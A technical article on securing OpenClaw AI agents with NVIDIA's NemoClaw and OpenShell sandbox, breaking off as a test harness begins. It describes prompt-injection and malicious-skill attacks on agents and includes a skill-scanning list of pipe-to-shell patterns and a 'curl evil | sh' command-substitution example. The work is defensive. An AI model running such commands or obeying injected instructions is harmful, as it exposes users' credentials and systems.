The phrase “nvidia openclaw security” now points to something very specific. It does not mean NVIDIA built OpenClaw from scratch. It means NVIDIA has stepped into the OpenClaw ecosystem with NemoClaw and OpenShell, a new runtime stack aimed at making long-running AI agents safer to deploy. NVIDIA announced NemoClaw on March 16, 2026, describing it as an open source stack that adds privacy and security controls to OpenClaw, with OpenShell sitting underneath as the runtime layer that governs what the agent can execute, what it can access, and where inference goes. NVIDIA’s own materials repeatedly frame the problem the same way: OpenClaw gave the market a powerful local-first agent platform, but the infrastructure to run that kind of agent safely was missing. (NVIDIA)

That framing matters because OpenClaw is not a normal chatbot. NVIDIA’s DGX Spark guide describes OpenClaw as a local-first agent with memory, file access, tool use, and community skills. OpenClaw’s own security guidance is even blunter: the system assumes a personal assistant trust model, one trusted operator boundary per gateway, and it explicitly warns that it is not a hostile multi-tenant isolation boundary for mutually untrusted users. Microsoft’s February 2026 guidance reaches the same conclusion from another angle: once an agent runs with durable credentials, shell access, plugins, and persistence, the runtime environment becomes the real security boundary, not just the model prompt. (NVIDIA NIM APIs)

That is why this subject deserves a serious article instead of another keynote recap. The interesting question is not whether NVIDIA added “guardrails.” The interesting question is whether the new stack changes the actual risk profile for engineers who are considering OpenClaw inside real environments, with real credentials, real files, real integrations, and real users. Some of the answer is yes. Some of it is very much no. (NVIDIA Developer)

OpenClaw became a security story before NVIDIA arrived

OpenClaw was already under pressure before NVIDIA introduced NemoClaw. Reuters reported on March 9 and March 10 that Chinese local governments were promoting OpenClaw-related industry activity even while regulators and state media were flagging data security concerns around the platform’s access to personal data. In parallel, enterprise and security publications were increasingly treating OpenClaw less like a novelty and more like an execution surface with a rapidly expanding blast radius. (Reuters)

SecurityScorecard’s February 11 research is the clearest example of why the conversation changed. Its STRIKE team said the immediate issue was not some abstract fear of autonomous AI, but access and exposed infrastructure. The company reported tens of thousands of exposed OpenClaw instances, said 35.4% of observed deployments were flagged as vulnerable at the time, and noted that in the first 24 hours of scanning it identified more than 40,000 exposed instances. That is not a theoretical problem. That is the standard internet-exposed-software problem, except the software in question may already have tokens, browser state, API access, messaging permissions, and the ability to execute tasks on behalf of a user or team. (SecurityScorecard)



Trend Micro added a second hard lesson. On February 23, it documented malicious OpenClaw skills used to distribute Atomic macOS Stealer. Its researchers described a campaign in which malicious instructions inside skill files pushed agents and users toward installing fake prerequisites and then running malicious payloads. Trend Micro identified 39 malicious skills tied to that AMOS delivery chain and later wrote that it had identified over 2,200 malicious skills on GitHub, arguing that it is impractical for defenders to manually review every skill before installation. That is exactly the kind of supply-chain reality that turns a developer toy into an enterprise security incident. (www.trendmicro.com)

Meanwhile, OpenClaw’s own maintainers never pretended that the system was automatically safe. The official security page says there is no “perfectly secure” setup, recommends starting from the smallest access that still works, and repeatedly emphasizes trust-boundary separation, least privilege, and deliberate exposure controls. NVIDIA’s own GeForce guide for running OpenClaw carries the same theme: use a separate clean PC or VM, avoid real accounts, limit skills, keep interfaces authenticated, and restrict internet access where possible. When both the original project and the hardware platform telling you how to run it say “treat this like a dangerous runtime,” you should take them literally. (OpenClaw)

The right mental model is not chatbot security

Many weak articles on this topic make the same mistake. They write about OpenClaw as though the security problem is just prompt injection plus a few scary demos. That is incomplete.



Microsoft’s February 19 security guidance breaks the boundary into three components: identity, execution, and persistence. Identity means the tokens and credentials the agent uses. Execution means the tools that change state, including shell, files, infrastructure, and messages. Persistence means the ways changes survive across runs, such as schedules, config, and state stores. Microsoft then reduces the operational problem to two classes of risk that matter immediately for self-hosted agent runtimes: indirect prompt injection and skill malware. That is a much better map than the usual “jailbreak” framing because it focuses on what the system can actually do after it is manipulated. (Microsoft)

OWASP’s AI Agent Security Cheat Sheet reaches a compatible conclusion. Its risk list includes prompt injection, tool abuse, data exfiltration, memory poisoning, excessive autonomy, cascading failures, denial of wallet, supply-chain compromise, and sensitive data exposure. Its best-practice list starts with least privilege on tools, then moves into input validation, memory isolation, human-in-the-loop controls, output validation, monitoring, and privacy. In other words, agent security is not a single-control problem. It is an architectural discipline. (OWASP Cheat Sheet Series)

OpenClaw’s own docs reinforce that point with very practical warnings. In a shared Slack workspace, the project says, any allowed sender can induce tool calls within the configured policy, prompt or content injection from one sender can affect shared state or outputs, and if a shared agent has sensitive credentials or files, any allowed sender may be able to drive exfiltration through tool use. That is not just a content-filtering issue. That is delegated authority with a weak trust boundary. (OpenClaw)

The fastest way to understand the risk is this: if a normal assistant answers incorrectly, you get bad text. If a long-running agent with browser, shell, disk, and network access reasons incorrectly, you get actions. If it has memory and scheduled execution, you also get persistence. If it has cloud access and messaging integrations, you get propagation. That is why NVIDIA’s entrance into the space matters. It is not because OpenClaw suddenly became dangerous in March. It is because the market finally accepted that the runtime layer itself needed to be re-engineered. (NVIDIA Developer)

What NVIDIA actually built

NVIDIA’s answer is NemoClaw, but the deeper technical answer is OpenShell.

The official NVIDIA NemoClaw page says NemoClaw adds privacy and security controls to OpenClaw and uses NVIDIA Agent Toolkit software to secure it. The NVIDIA Newsroom announcement adds more detail: NemoClaw installs OpenShell to provide an isolated sandbox with policy-based security, network controls, and privacy guardrails. NVIDIA’s developer blog goes even further and explains the design principle that matters most: out-of-process policy enforcement. Instead of relying on the agent’s own prompt-level behavior to stay within bounds, OpenShell places the enforcement layer outside the agent process, which means the agent cannot simply override the very controls that are supposed to contain it. (NVIDIA)

That architectural choice is the whole ballgame. In NVIDIA’s description, OpenShell has three key components. The first is the sandbox, designed for long-running, self-evolving agents rather than generic developer containers. The second is the policy engine, which evaluates actions across filesystem, network, and process layers. The third is the privacy router, which determines whether context and inference stay local or route to frontier cloud models based on policy rather than the agent’s own judgment. NVIDIA repeatedly describes this as the missing infrastructure layer beneath “claws.” (NVIDIA Developer)
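The policy-engine idea fits in a few lines. This is not OpenShell’s API or policy format. The `Action` and `Policy` types, the layer names, and the rule shapes below are hypothetical. They only show default-deny evaluation of filesystem, network, and process requests against a policy object the agent cannot modify. In a real deployment that immutability comes from running the enforcer outside the agent process; here `frozen=True` is only a stand-in.

```python
import posixpath
from dataclasses import dataclass
from pathlib import PurePosixPath

# Hypothetical action and policy types; NOT OpenShell's real schema.
@dataclass(frozen=True)
class Action:
    layer: str   # "filesystem", "network", or "process"
    target: str  # an absolute path, a hostname, or an executable name

@dataclass(frozen=True)
class Policy:
    # frozen=True: the policy cannot be mutated after creation, standing in
    # for enforcement that lives outside the agent process.
    readable_roots: tuple[str, ...] = ()
    allowed_hosts: frozenset[str] = frozenset()
    allowed_binaries: frozenset[str] = frozenset()

def evaluate(policy: Policy, action: Action) -> bool:
    """Return True only if the action is explicitly allowed (default deny)."""
    if action.layer == "filesystem":
        # normpath collapses ".." lexically so /root/../../etc is not mistaken for /root/...
        path = PurePosixPath(posixpath.normpath(action.target))
        return any(path.is_relative_to(root) for root in policy.readable_roots)
    if action.layer == "network":
        return action.target in policy.allowed_hosts
    if action.layer == "process":
        return action.target in policy.allowed_binaries
    return False  # unknown layers are denied
```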

That design is why so many early reactions focused on the same handful of words: isolated sandbox, privacy router, policy engine, enterprise security, safer agents. CIO summarized NemoClaw as OpenClaw plus sandbox isolation and a privacy router to address security weaknesses. TechCrunch described it as OpenClaw with enterprise-grade security and privacy features baked in. NVIDIA’s own page frames it as a way to run autonomous agents more safely with one command. Across sources, the interpretation is consistent: NVIDIA is trying to turn OpenClaw from a powerful but risky personal-agent runtime into something enterprises can actually govern. (CIO)

One other point matters operationally. NVIDIA’s GitHub page for NemoClaw labels the project alpha software and says it is early-stage, not yet production-ready, and still evolving toward production-grade sandbox orchestration. That caution is healthy. It means you should read NemoClaw as a serious new runtime control plane, but not as a magic “install once and forget about security” product. (GitHub)

Why OpenShell is more important than NemoClaw branding

The cleaner way to think about this stack is that NemoClaw is the packaging, while OpenShell is the security primitive.

NVIDIA’s official documentation says OpenShell sits between the agent and the infrastructure to govern how the agent executes, what it can see and do, and where inference goes. The OpenShell overview page says it exists because agents need access to files, packages, APIs, and credentials, but that same access creates material risk. Its goal is to preserve agent capability while enforcing explicit controls over what the agent can touch. (NVIDIA Docs)

This is an important shift because too much of the current agent ecosystem still treats safety as something that happens inside the agent. Better system prompts. Better refusal behavior. Better classification. Better preambles. Those things help, but they are not enough when the agent has shell access and the authority to call tools. NVIDIA’s blog makes the criticism plainly: if your guardrails live in the same process they are supposed to guard, a compromised or manipulated agent can push against them from the inside. OpenShell changes that by moving control outside the agent process. (NVIDIA Developer)

This also explains why the OpenShell design is broader than OpenClaw itself. NVIDIA explicitly says OpenShell can run OpenClaw, Claude Code, Codex, and other agents unmodified inside the same controlled environment. That matters because the real category here is not “OpenClaw security” in isolation. It is runtime security for autonomous agents with delegated authority. If OpenShell works as described, its significance goes beyond OpenClaw. (NVIDIA Developer)

What NemoClaw genuinely improves

The fairest reading is that NemoClaw meaningfully improves four things.

Filesystem and process containment

OpenShell’s sandboxing model is designed to stop the agent from inheriting unrestricted host access. NVIDIA says the runtime uses kernel-level isolation and declarative policy to control filesystem, process, and network behavior. In practical terms, that means a compromised or confused agent should not automatically be able to read arbitrary host paths, spawn arbitrary binaries, or persist wherever it wants. That is a very material upgrade over running OpenClaw directly on a developer laptop or a lightly isolated VM with broad permissions. (NVIDIA Docs)
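NVIDIA describes OpenShell’s filesystem containment as kernel-level isolation driven by declarative policy. A snippet cannot reproduce that. It can show the application-level version of the same rule, which is useful as defense in depth inside any tool that accepts paths: resolve the requested path first, collapsing `..` and following symlinks, then check that it still sits under the allowed root. Lexical checks alone miss symlinks. The `is_within` helper is hypothetical.

```python
from pathlib import Path

def is_within(root: str, candidate: str) -> bool:
    """Application-level check: does `candidate` resolve to a location inside `root`?

    resolve() collapses ".." segments and follows symlinks, so paths such as
    root/../../etc/passwd, or a symlink pointing outside the root, are rejected.
    """
    root_path = Path(root).resolve()
    # Relative candidates are interpreted relative to the sandbox root;
    # an absolute candidate replaces the root entirely and is checked as-is.
    target = (root_path / candidate).resolve()
    return target.is_relative_to(root_path)
```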

Network egress control

NVIDIA’s DGX Spark playbook is unusually direct on this point. It says OpenShell controls which network endpoints the agent can reach and ships with deny-by-default outbound policy unless explicitly allowed. That is exactly the kind of control you want when your threat model includes prompt injection, malicious skills, credential theft, or quiet exfiltration to attacker infrastructure. If an agent cannot dial arbitrary endpoints, many real-world attack chains get much harder. (NVIDIA NIM APIs)
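The deny-by-default idea is easy to express, although OpenShell enforces it at the runtime layer rather than inside agent code. The sketch below assumes a hypothetical `ALLOWED_HOSTS` set and matches exact hostnames only. Suffix or substring matching would let lookalike hosts such as `api.github.com.attacker.example` through. Relying on the parsed hostname also defeats the `user@host` trick.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist for illustration; a real deployment derives this from policy.
ALLOWED_HOSTS = frozenset({"api.github.com", "inference.internal.example"})

def egress_allowed(url: str, allowed_hosts: frozenset[str] = ALLOWED_HOSTS) -> bool:
    """Default-deny egress check: permit only https URLs whose exact hostname is allowlisted."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    # .hostname drops userinfo and port and is already lowercased.
    host = parts.hostname or ""
    return host in allowed_hosts
```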

Local inference and privacy routing

NVIDIA repeatedly ties NemoClaw to local Nemotron models and to a privacy router that decides when cloud inference is allowed. That matters because a large share of agent-related data leakage risk is not dramatic compromise. It is casual over-sharing of code, credentials, tickets, documents, logs, or customer data into a remote model path that nobody properly scoped. Routing decisions at the runtime layer are stronger than hoping the agent remembers policy every time it chooses a provider. (NVIDIA)
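NVIDIA does not describe its router’s rules in the sources cited here, so the following is only an illustrative sketch. The hypothetical `route_inference` function keeps a request local whenever cloud use is disallowed or the context matches a few hypothetical secret patterns. A regex list is a weak classifier. The point is where the decision lives, not how it is made.

```python
import re

# Hypothetical patterns; a real data classifier would be far more thorough.
SENSITIVE_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),                    # shape of an AWS access key ID
    re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),  # PEM private key header
    re.compile(r"(?i)\b(password|secret|api[_-]?key|token)\s*[:=]"),
]

def route_inference(context: str, cloud_allowed: bool) -> str:
    """Return "local" or "cloud", decided by policy rather than by the agent.

    Cloud routing is used only when policy permits it AND the context does not
    match any sensitive pattern; everything else stays local.
    """
    if not cloud_allowed:
        return "local"
    if any(p.search(context) for p in SENSITIVE_PATTERNS):
        return "local"
    return "cloud"
```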

Better operational defaults for experimentation

NVIDIA’s own deployment playbooks tell users to run OpenClaw in a clean environment, avoid real accounts, vet skills, lock down remote access, and restrict network connectivity. Those are not revolutionary ideas, but the fact that NVIDIA packaged them together with an isolation runtime gives teams a better starting position than raw self-hosted agent experimentation ever did. OpenClaw’s original docs already encouraged caution; OpenShell makes that caution enforceable in more places. (NVIDIA)

What NemoClaw does not fix

This is where most of the lightweight commentary falls apart. NemoClaw is real progress. It is not a universal solvent.

It does not change OpenClaw’s trust model

The OpenClaw docs still say the platform assumes one trusted operator boundary per gateway and is not a supported multi-tenant hostile boundary. If you put one agent in a shared environment where mutually untrusted users can drive the same tool authority, you still have a governance problem. A sandbox can reduce host compromise. It does not make a weak authorization model disappear. (OpenClaw)
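A sandbox limits what the agent can reach on the host. It says nothing about which sender may drive which tool. Here is a minimal sketch of per-sender authorization, assuming a hypothetical `SENDER_GRANTS` table keyed by sender identity. It complements, rather than replaces, OpenClaw’s guidance to use separate gateways for mutually untrusted users.

```python
# Hypothetical sender-to-tool grants; identities and tool names are illustrative only.
SENDER_GRANTS: dict[str, frozenset[str]] = {
    "operator@example.com": frozenset({"read_file", "write_file", "run_shell"}),
    "teammate@example.com": frozenset({"read_file"}),
}

def authorize(sender: str, tool: str,
              grants: dict[str, frozenset[str]] = SENDER_GRANTS) -> bool:
    """Allow a tool call only if this specific sender was granted that tool.

    Unknown senders get no tools. What the agent as a whole can do is irrelevant;
    what matters is the authority of whoever triggered the call.
    """
    return tool in grants.get(sender, frozenset())
```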

It does not make prompt injection irrelevant

OWASP still treats prompt injection, including indirect prompt injection, as a primary risk for agentic systems. Microsoft still treats indirect prompt injection as one of the two defining classes of self-hosted runtime risk. OpenClaw’s own docs explicitly warn that injection can arrive through webpages, fetched results, emails, attachments, logs, and pasted code, not just direct user prompts. OpenShell can reduce the damage if policy is tight, but it does not stop the model from seeing malicious content in the first place. (OWASP Cheat Sheet Series)

It does not solve malicious skills and supply-chain poisoning

Trend Micro documented real malicious OpenClaw skills being used to distribute AMOS. Microsoft describes skill malware as a core category of self-hosted runtime risk. OWASP includes supply-chain compromise in its agent security guidance. NVIDIA’s sandbox helps, but if you allow dangerous install paths, overbroad permissions, or egress to attacker infrastructure, a malicious extension can still do meaningful harm. Containment lowers blast radius. It does not replace curation, signing, allowlists, and skill review. (www.trendmicro.com)
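Curation can start with cheap automated screening. The following sketch flags a few patterns commonly associated with fetch-and-run install chains, such as instructions to pipe a downloaded script into a shell. The pattern list is hypothetical and far from complete. A hit should send the skill to human review, and a clean result proves nothing.

```python
import re

# Hypothetical red-flag patterns for skill files. A hit means "needs human review";
# an empty result does NOT mean the skill is safe.
RED_FLAGS = {
    "pipe_to_shell": re.compile(r"(curl|wget)[^\n|]*\|\s*(ba|z)?sh\b"),
    "base64_decode_exec": re.compile(r"base64\s+(-d|--decode)"),
    "quarantine_bypass": re.compile(r"xattr\s+-(d|c)"),  # macOS quarantine attribute removal
    "chmod_exec": re.compile(r"chmod\s+\+x"),
}

def scan_skill_text(text: str) -> list[str]:
    """Return the sorted names of red-flag patterns found in a skill file's text."""
    return sorted(name for name, pattern in RED_FLAGS.items() if pattern.search(text))
```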

It does not solve identity sprawl

An agent can be perfectly sandboxed and still be dangerous if it is holding broad credentials. SecurityScorecard’s research points out the obvious but often ignored implication: when attackers compromise an agentic system, they inherit whatever access the agent already has. Microsoft describes identity as one of the three runtime boundary components for the same reason. NemoClaw improves containment. It does not rewrite your IAM model. (SecurityScorecard)

It does not guarantee the model will exercise good judgment

The 1Password SCAM benchmark is one of the best recent reminders of this. The company found that agents can identify phishing or risky content and still proceed to do the dangerous thing anyway. It documented cases where high-end models clicked suspicious links, retrieved real credentials, and submitted them before recognizing the threat. The central lesson is devastatingly simple: recognition is not restraint. A stronger runtime helps keep the damage bounded, but it does not magically convert unsafe decision-making into safe decision-making. (1Password)

It does not eliminate classic AppSec defects

OpenClaw’s 2026 CVE stream shows that agent runtimes remain ordinary software, with ordinary software bugs, in addition to agent-specific risks. If you only think about “AI safety” and ignore traditional vulnerability classes like command injection, path traversal, auth bypass, token leakage, and SSRF, you will miss some of the most exploitable failure modes. NVIDIA’s runtime does not change that truth. (NVD)

The CVEs that matter most right now

The OpenClaw ecosystem has accumulated enough published vulnerabilities that defenders can stop speaking in vague hypotheticals. The list below is not exhaustive, but it captures several of the most relevant issues for anyone working on nvidia openclaw security in March 2026.

| CVE | Published | What happened | Why it matters |
|---|---|---|---|
| CVE-2026-25253 | 2026-02-04 | OpenClaw could take a gatewayUrl from a query string and auto-connect via WebSocket, sending a token value in vulnerable versions before 2026.1.29. | Browser/UI-origin assumptions and token handling are part of the attack surface, not implementation details. (NVD) |
| CVE-2026-24763 | 2026-02-02 | OpenClaw’s Docker sandbox execution path had a command injection issue tied to unsafe PATH handling before 2026.1.29. | “It runs in Docker” is not a security argument by itself. Sandboxes fail in ordinary ways. (NVD) |
| CVE-2026-25475 | 2026-02-04 | Media parsing allowed arbitrary file paths, enabling agents to read any file on the system via crafted MEDIA: paths before 2026.1.30. | Data exfiltration is often one parser bug away when the runtime can touch the filesystem. (NVD) |
| CVE-2026-28472 | 2026-03-05 | Gateway WebSocket handshake logic let attackers skip device identity checks in some cases before 2026.2.2. | Auth and pairing logic on agent control planes deserve the same scrutiny as any admin interface. (NVD) |
| CVE-2026-22179 | 2026-03-17 | macOS system.run parsing allowed an allowlist bypass via command substitution before 2026.2.22. | Even explicit allowlists can be defeated by shell parsing mistakes if command execution remains in scope. (NVD) |
| CVE-2026-30741 | 2026-03-11 | NVD describes an RCE in OpenClaw Agent Platform v2026.2.6 via request-side prompt injection. | This is the nightmare scenario everyone talks about: prompt-originated content crossing the line into execution. (NVD) |

The value of this table is not just historical. It shows a pattern. The vulnerabilities span token leakage, auth bypass, file exfiltration, OS command injection, and prompt-to-execution abuse. That is exactly why runtime security has become the center of gravity. OpenClaw is neither “just an LLM app” nor “just another web admin console.” It inherits both sets of problems and then combines them with delegated authority. (NVD)
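The allowlist-bypass entry (CVE-2026-22179) is a good example of an ordinary bug class. The sketch below is not OpenClaw’s code. It is a generic illustration, using a hypothetical `ALLOWED_COMMANDS` set, of why checking only the first word of a shell string fails. It also shows a stricter alternative that refuses shell metacharacters and returns an argv list for execution without a shell.

```python
import shlex
from typing import Optional

ALLOWED_COMMANDS = frozenset({"ls", "cat", "git"})  # hypothetical allowlist
SHELL_METACHARACTERS = set("$`;&|<>(){}\n")

def naive_allowed(command: str) -> bool:
    """Flawed: checks only the first word, so `ls $(curl evil | sh)` passes."""
    parts = command.split()
    return bool(parts) and parts[0] in ALLOWED_COMMANDS

def strict_allowed(command: str) -> Optional[list[str]]:
    """Return an argv list suitable for subprocess.run(argv, shell=False), or None.

    Any shell metacharacter is rejected outright (no command substitution,
    pipes, redirection, or chaining); then the program name is allowlisted.
    """
    if any(ch in SHELL_METACHARACTERS for ch in command):
        return None
    try:
        argv = shlex.split(command)
    except ValueError:  # e.g. unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        return None
    return argv
```

Argument-level policy, such as which files `cat` may read, still has to be enforced separately.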

The deployment mistakes that keep turning up

OpenClaw’s security docs are useful precisely because they are not shy about common operator mistakes.

The gateway is loopback-first by default, with gateway.bind: "loopback" meaning only local clients can connect. The docs warn that non-loopback binds expand the attack surface, recommend tight firewalling if you must use them, and explicitly say: never expose the Gateway unauthenticated on 0.0.0.0. That should be treated as foundational guidance, not an optional hardening extra. (OpenClaw)
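When you review `ss -lntp` output from a gateway host, you can check the local-address column mechanically. This hypothetical helper takes the address portion only, without the port. It treats anything that is not a loopback address as exposed. That includes the all-interfaces addresses `0.0.0.0` and `::` and unparseable values such as `*`. It checks addresses, not OpenClaw’s `gateway.bind` configuration values.

```python
import ipaddress

def bind_is_local_only(bind_address: str) -> bool:
    """Return True only if a listen address accepts connections from this host alone.

    Accepts bracketed IPv6 as printed by ss (e.g. "[::1]"). Wildcards such as
    "0.0.0.0", "::", or "*" and anything unparseable are treated as exposed.
    """
    host = bind_address.strip("[]")
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return addr.is_loopback
```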

The same page also warns about reverse proxy configuration. If you put the gateway behind a proxy, trustedProxies has to be configured properly so proxied connections do not accidentally inherit local trust. For non-loopback Control UI deployments, allowedOrigins is required by default, and the docs warn against sloppy origin policies or public exposure. In other words, some of the biggest OpenClaw risks are still the boring ones: a proxy header mistake, a bind mistake, a published Docker port, or an overly trusting auth assumption. (OpenClaw)
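The reverse-proxy pitfall comes down to one rule: forwarded client-address headers only mean something when the direct peer is a proxy you trust. The sketch below is generic logic, not OpenClaw’s `trustedProxies` implementation. The `TRUSTED_PROXIES` network and the single-proxy-hop assumption are hypothetical.

```python
import ipaddress
from typing import Optional

# Hypothetical: the only reverse proxy allowed to vouch for client addresses.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.5/32")]

def effective_client_ip(peer_ip: str, x_forwarded_for: Optional[str]) -> str:
    """Pick the client address to use for trust decisions.

    X-Forwarded-For is honored only when the direct TCP peer is a trusted proxy;
    otherwise any client could claim to be 127.0.0.1 simply by sending the header.
    """
    peer = ipaddress.ip_address(peer_ip)
    if x_forwarded_for and any(peer in net for net in TRUSTED_PROXIES):
        # Assuming one proxy hop: the right-most entry is what that proxy observed.
        return x_forwarded_for.split(",")[-1].strip()
    return peer_ip
```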

This is where NVIDIA’s runtime model helps the most, but only if teams use it as part of a real deployment discipline. If you drop a local-first agent into a controlled OpenShell sandbox but then hand it production credentials, expose its proxy incorrectly, and allow broad outbound access, you did not really solve the problem. You just moved it around. (NVIDIA NIM APIs)

A practical comparison: raw OpenClaw versus NemoClaw with OpenShell

| Security concern | Raw OpenClaw tendency | NemoClaw with OpenShell | Still required from the operator |
|---|---|---|---|
| Host filesystem access | Easy to over-grant, especially in casual local installs | Runtime policy can restrict what paths are reachable | Deliberate path scoping, secret hygiene, separate hosts for higher trust separation (OpenClaw) |
| Network egress | Often broad unless manually constrained | Deny-by-default style policy is feasible in OpenShell | Explicit endpoint allowlists, proxy governance, segmentation (NVIDIA NIM APIs) |
| Cloud inference exposure | Depends on model/provider configuration | Privacy router can route by policy | Data classification, provider approval, logging and review (NVIDIA Developer) |
| Agent process self-policing | Guardrails often live inside the agent | Out-of-process enforcement reduces self-bypass risk | Correct policy design, change control, audit discipline (NVIDIA Developer) |
| Shared workspace governance | Weak if one agent serves mixed-trust users | Sandboxing helps host isolation, not trust separation | Separate gateways, separate credentials, stronger sender authorization (OpenClaw) |
| Malicious skills | Major supply-chain risk | Sandbox can limit some damage | Signing, allowlists, review, quarantined testing before install (www.trendmicro.com) |
| Prompt injection | Still dangerous | Blast radius can be reduced if tools and egress are constrained | Input isolation, reader-vs-actor separation, human approval for sensitive actions (OWASP Cheat Sheet Series) |

The hardening blueprint that actually matters

If you are evaluating NVIDIA’s approach to OpenClaw security, the question is not “Should I trust NemoClaw?” The question is “What controls should exist before, during, and after I deploy it?” A useful blueprint looks like this.

1. Separate readers from actors

One of the clearest lessons from OWASP, Microsoft, and OpenClaw’s own docs is that untrusted content should not automatically sit in front of the same tool authority that can modify state. If an agent browses external pages, reads emails, summarizes documents, or fetches logs, do not assume it should also have shell access, file write capability, or privileged connectors in the same execution path. Build different trust tiers. Let one runtime ingest hostile content. Let another runtime act only on cleaned, reviewed, or user-approved instructions. (OWASP Cheat Sheet Series)

2. Treat identity as part of the runtime, not an app setting

Microsoft’s identity-execution-persistence model is a useful discipline here. Enumerate every token, every mailbox, every API key, every repo credential, every cloud principal, and every browser session the agent can inherit. Then cut that list down aggressively. If a given claw only needs read access to one bucket and one issue tracker, do not let it hold a general-purpose engineer account. If a skill needs temporary access, give it temporary credentials. If a connector is not required, disable it. (Microsoft)
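You can make that enumerate-then-cut exercise repeatable with a small review function. The `Credential` record, the scope strings, and the wording of the findings below are hypothetical. The inventory itself would come from your own secret store, environment, and connector configuration.

```python
from dataclasses import dataclass

@dataclass
class Credential:
    name: str          # e.g. an environment variable or connector name (hypothetical)
    scopes: set[str]   # what the credential can actually do
    expires: bool      # False for long-lived tokens

def review(credentials: list[Credential], required_scopes: set[str]) -> dict[str, list[str]]:
    """Flag credentials that are unused, over-scoped, or long-lived."""
    findings: dict[str, list[str]] = {}
    for cred in credentials:
        issues = []
        extra = cred.scopes - required_scopes
        if not cred.scopes & required_scopes:
            issues.append("unused: remove or disable")
        elif extra:
            issues.append(f"over-scoped: drop {', '.join(sorted(extra))}")
        if not cred.expires:
            issues.append("long-lived: prefer temporary credentials")
        if issues:
            findings[cred.name] = issues
    return findings
```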

3. Keep the gateway local unless there is a very good reason not to

OpenClaw’s official guidance is loopback-first for a reason. If you need remote access, use a strongly authenticated path and keep the gateway’s attack surface narrow. If you use Docker, remember that published ports have their own forwarding behavior. If you use a reverse proxy, configure trusted proxy handling correctly. If you use LAN binds, firewall them tightly. If you are casually publishing ports during experimentation, you are reproducing the conditions that made exposed instances such a major February story. (OpenClaw)

4. Put policy outside the agent

This is the strongest part of NVIDIA’s architecture. Use it. The correct security posture for self-evolving agents is not “ask the model to be careful.” It is “make the environment enforce what careful means.” If the agent should not talk to arbitrary hosts, make that a network policy. If it should not read home directories, make that a filesystem policy. If it should not spawn shells or write to persistence paths, make that a process policy. The more your control plane lives outside the agent process, the less damage prompt-level manipulation can do. (NVIDIA Developer)

5. Use human approval for actions that change state

OWASP explicitly recommends human-in-the-loop controls for high-impact or irreversible actions. NVIDIA’s description of OpenShell also assumes a model where agents can request policy changes, but humans approve them. That is the right posture. Browsing and summarization may be low-risk. Writing files, sending messages, modifying infrastructure, forwarding credentials, executing packages, or installing skills should not be treated as low-friction defaults. (OWASP Cheat Sheet Series)
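Here is a minimal approval gate. It assumes hypothetical action names and an `approve` callback supplied by whatever human-facing channel you use. The key design choice is that unknown actions fall into the approval path, so a newly added tool stays gated until someone classifies it.

```python
from typing import Callable

# Hypothetical action names; mirrors the low-risk vs state-changing split above.
LOW_RISK = frozenset({"browse", "summarize", "read_file"})

def run_action(action: str, execute: Callable[[], str], approve: Callable[[str], bool]) -> str:
    """Execute low-risk actions directly; everything else needs explicit human approval.

    `approve` is only called for actions outside LOW_RISK, including unknown ones.
    """
    if action in LOW_RISK or approve(action):
        return execute()
    return f"blocked: {action} was not approved"
```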

6. Review skills like code, not like “content”

Trend Micro’s AMOS campaign is enough to settle this point. Skills are not innocent markdown decorations. They are part of the execution supply chain. Microsoft calls skill malware a core risk. OWASP includes supply-chain attacks in its key agent threats. If a team is willing to put a skill into a runtime with delegated authority, that skill should go through provenance checks, static analysis, behavioral observation, and containment testing before it is blessed for broader use. (www.trendmicro.com)

7. Audit memory and persistence, not just active sessions

OWASP calls out memory poisoning and memory isolation. Microsoft calls out persistence. OpenClaw’s docs note that session logs and local state can live on disk under ~/.openclaw. That means compromise is not just about what happens live in the terminal. It is about what survives after the session ends: auth artifacts, local transcripts, cached secrets, and state that future runs may inherit. If you only monitor live prompts and tool calls, you are missing half the problem. (OWASP Cheat Sheet Series)
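One inexpensive way to watch persistence is to snapshot file digests under the agent’s state directory before and after each run, then diff them. The helpers below are a sketch under that assumption. Storing only SHA-256 digests avoids copying secrets into the snapshot itself.

```python
import hashlib
from pathlib import Path

def snapshot(root: Path) -> dict[str, str]:
    """Map each file under `root` (as a POSIX-style relative path) to its SHA-256 digest."""
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }

def diff(before: dict[str, str], after: dict[str, str]) -> dict[str, list[str]]:
    """Report files added, removed, or changed between two snapshots."""
    return {
        "added": sorted(after.keys() - before.keys()),
        "removed": sorted(before.keys() - after.keys()),
        "changed": sorted(k for k in before.keys() & after.keys() if before[k] != after[k]),
    }
```

In practice you would call `snapshot(Path.home() / ".openclaw")` before and after a session. Then review anything under `added` or `changed`, such as new schedules or cached credentials.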

A compact hardening and validation sequence

Below is a practical sequence that security engineers can adapt. It is intentionally simple, because most agent failures do not begin with elegant theory. They begin with reachable ports, inherited credentials, and permissive tools.

```bash
# 1. Verify what is listening
ss -lntp
lsof -i -P -n | grep LISTEN

# 2. Confirm the agent gateway is not publicly reachable (run this from another host)
nmap -Pn -p 1-65535 <agent-host-ip> --open

# 3. Run OpenClaw's own audit
openclaw security audit
openclaw security audit --deep

# 4. Check container publishing if Docker is involved (iptables needs root)
docker ps --format 'table {{.Names}}\t{{.Ports}}'
sudo iptables -S DOCKER-USER
sudo ip6tables -S DOCKER-USER

# 5. Snapshot what credentials the runtime can actually reach (print names, not values)
env | grep -E 'KEY|TOKEN|SECRET|PASSWORD' | cut -d= -f1
find ~/.openclaw -maxdepth 3 -type f | sort
```

OpenClaw’s docs explicitly recommend running its security audit regularly, especially after config changes or network exposure changes. The same docs warn against unauthenticated public exposure, emphasize loopback binding by default, and include guidance for Docker/DOCKER-USER and reverse proxy hardening. The point of the shell block above is not novelty. It is to force the operator to verify the boring conditions that most often collapse first. (OpenClaw)

Once the basic exposure picture is clean, validate agent behavior with hostile content rather than only with direct prompt tricks. The OWASP prompt injection guidance explicitly calls out indirect injection via webpages, documents, emails, and code comments. OpenClaw’s own security docs say the same. Microsoft’s guidance says self-hosted runtimes should be built on the assumption that they will eventually process malicious external content. That should drive your test plan. (OWASP Cheat Sheet Series)

```python
# Illustrative prompt-to-action test harness
test_cases = [
    {
        "name": "phishing_email_with_embedded_instructions",
